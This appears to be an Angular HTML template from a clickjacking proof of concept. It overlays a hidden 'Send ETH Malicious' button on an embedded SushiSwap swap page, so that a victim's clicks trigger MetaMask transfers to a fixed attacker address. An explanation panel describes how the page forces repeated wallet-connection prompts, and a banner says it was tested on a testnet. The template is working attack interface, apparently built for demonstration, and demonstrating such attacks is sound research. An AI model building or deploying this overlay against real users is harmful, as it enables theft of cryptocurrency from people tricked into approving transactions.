<main>
  <section class="left">
    <iframe id="sushiswapIframe" (load)="handleIframeLoad()" [style.opacity]="iframeOpacity" src="https://www.sushi.com/swap">
    </iframe>

    <button class="supply-eth" *ngIf="supplyEth" [style.opacity]="buttonOpacity" (click)="sendEthToTarget()">
      Send ETH Malicious Button
    </button>

    <div class="spinner" *ngIf="spinner">
      <mat-spinner></mat-spinner>
      <h1>Connecting to Wallet. . .</h1>
    </div>
  </section>

  <section class="right">
    <h2>⚠️ Test this only in Testnets to avoid fund loss ⚠️</h2>
    <h3>{{accountConnectedAddress ? ('Connected to Victim Address: ' + accountConnectedAddress) : 'Not Connected'}}</h3>
    <h3>{{'Malicious Address: ' + targetAddress}}</h3>

    <div>
      <span>Opacity of iframe</span>
      <mat-slider [max]="1" [min]="0" [step]="0.1" [discrete]="true" [showTickMarks]="true">
        <input matSliderThumb [(ngModel)]="iframeOpacity">
      </mat-slider>
      <span>{{iframeOpacity * 100 + ' %'}}</span>
    </div>

    <div>
      <span>Opacity of Malicious Send Eth Button</span>
      <mat-slider [max]="1" [min]="0" [step]="0.1" [discrete]="true" [showTickMarks]="true">
        <input matSliderThumb [(ngModel)]="buttonOpacity">
      </mat-slider>
      <span>{{buttonOpacity * 100 + ' %'}}</span>
    </div>

    <div class="list">
      <h4>1. When the malicious site loads:</h4>
      <p>
        1.1 MetaMask pops up to connect to the malicious site (to perform bad activity).<br>
        1.2 If the user cancels the connection, MetaMask keeps asking for connecting to the malicious site
        recursively until the connection is accepted.<br>
      </p>

      <h4>2. After connecting:</h4>
      <p>
        2.1 The "Send ETH Malicious" button becomes active with large width and height, and a positive z-index,
        ensuring it stays on top of the SushiSwap iframe.
      </p>

      <h4>3. Whenever the victim clicks anywhere in the SushiSwap iframe:</h4>
      <p>
        3.1 The victim is actually clicking on the malicious button, which triggers a MetaMask transaction approval
        request to send ETH to the malicious target address.<br>
        3.2 The malicious address is unchangeable.<br>
        3.3 Once the transaction is approved, ETH is sent from the victim's address to the attacker's address.
      </p>

      <h4>4. Testing:</h4>
      <p>Everything was tested on the Sepolia testnet.</p>
    </div>
  </section>
</main>